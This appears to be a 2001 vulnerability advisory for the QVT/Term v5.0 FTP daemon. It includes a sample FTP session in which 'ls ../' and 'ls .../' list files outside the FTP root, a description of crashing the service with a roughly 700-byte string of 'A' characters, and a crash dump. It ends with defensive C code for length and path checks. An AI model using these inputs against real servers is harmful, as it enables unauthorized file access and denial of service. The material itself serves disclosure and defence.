QVT/Term buffer overflow vulnerability

Published: 2001-09-27
Updated: 2001-09-27
Severity: Medium
Threat: Remote unauthorized file access
Error type: Input validation error
Exploitation mode: Server mode

Affected systems

QVT/Term v5.0

Detailed description

QVT/Term v5.0 is a suite of Internet tools from http://www.qpc.com/. Its FTP daemon contains two vulnerabilities: the first allows a remote user to list files outside the FTP directory, and the second allows a remote user to crash the server.

Test code

The following test demonstrates the directory traversal:

    > ftp localhost
    Connected to xxxxxxxxx.rh.rit.edu.
    220 xxxxxxxxx FTP server (QVT/Net 4.3) ready.
    User (xxxxxxxxx.rh.rit.edu:(none)): anonymous
    331 Guest login OK, please send real ident as password.
    Password:
    230 Guest login OK, access restrictions apply.
    ftp> ls ../
    200 PORT command successful.
    150 Opened data connection for 'ls' (xxxxxxxxx,1048) (0 bytes).
    root
    226 Transfer complete.
    ftp: 6 bytes received in 0.05Seconds 0.12Kbytes/sec.
    ftp> ls .../
    [file listing of C:\ is shown here]
    226 Transfer complete.
    ftp: 1192 bytes received in 0.11Seconds 10.84Kbytes/sec.
    ftp>

A remote user who connects to port 21 and sends an overlong string of 'A' characters, roughly 700 bytes, causes the service to crash:

    FTPD caused an invalid page fault in
    module FTPD.EXE at 017f:00404b34.
    Registers:
    EAX=0000200a CS=017f EIP=00404b34 EFLGS=00010213
    EBX=0066799b SS=0187 ESP=0064fac8 EBP=00666a58
    ECX=0000066c DS=0187 ESI=00667ff3 FS=1bb7
    EDX=006699a5 ES=0187 EDI=00669ffd GS=0000
    Bytes at CS:EIP:
    f3 a5 8b c8 68 70 fc 40 00 83 e1 03 53 f3 a4 8b
    Stack dump:
    00000004 00771b90 00666a58 0064fbc0 0000060a 12948ae8 00771b90 004105a0
    00288b30 bff728a2 0187bff7 bff713e2 12948b04 0a2c175f 12990002 00288b4c

Solution

None yet.

Related information

e-mail: joetesta@hushmail.com
web page: http://hogs.rit.edu/~joet/
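
A server-side check for the two input-validation failures described above, as an added example that is not code from QVT/Term or from the original advisory: it bounds the command line before any copy and refuses path arguments containing dot-only components. The function names, the 512-byte limit, and the decision to treat "..." like ".." (as the "ls .../" result in the session suggests) are assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_CMD_LEN 512   /* assumed size of the server's line buffer */

/* Hypothetical helper: 1 if a command line of n bytes fits the buffer
 * (with room for the terminator), 0 if it must be refused uncopied. */
int cmd_len_ok(size_t n)
{
    return n < MAX_CMD_LEN;
}

/* Hypothetical helper: 1 if a client-supplied path argument cannot climb
 * above the FTP root, 0 otherwise. Deliberately strict: it refuses every
 * dot-only component of two or more dots ("..", "...", "...."), even
 * where the resolved path would still end up inside the root. */
int path_arg_ok(const char *arg)
{
    const char *p = arg;

    if (arg == NULL || !cmd_len_ok(strlen(arg)))
        return 0;
    /* No absolute paths and no drive specifiers such as "C:". */
    if (*p == '/' || *p == '\\' || strchr(arg, ':') != NULL)
        return 0;

    while (*p != '\0') {
        size_t len  = strcspn(p, "/\\");   /* length of this component  */
        size_t dots = strspn(p, ".");      /* leading run of '.' in it  */
        if (len >= 2 && dots == len)       /* component is only dots    */
            return 0;
        p += len;
        if (*p != '\0')
            p++;                           /* step over the separator   */
    }
    return 1;
}

int main(void)
{
    /* Constructed inputs: the two arguments from the session above,
     * plus one legitimate path. */
    const char *samples[] = { "../", ".../", "pub/readme.txt" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-16s -> %s\n", samples[i],
               path_arg_ok(samples[i]) ? "allow" : "reject");
    return 0;
}
```

The length check has to run on the byte count received from the socket, before the line is copied into any fixed-size buffer.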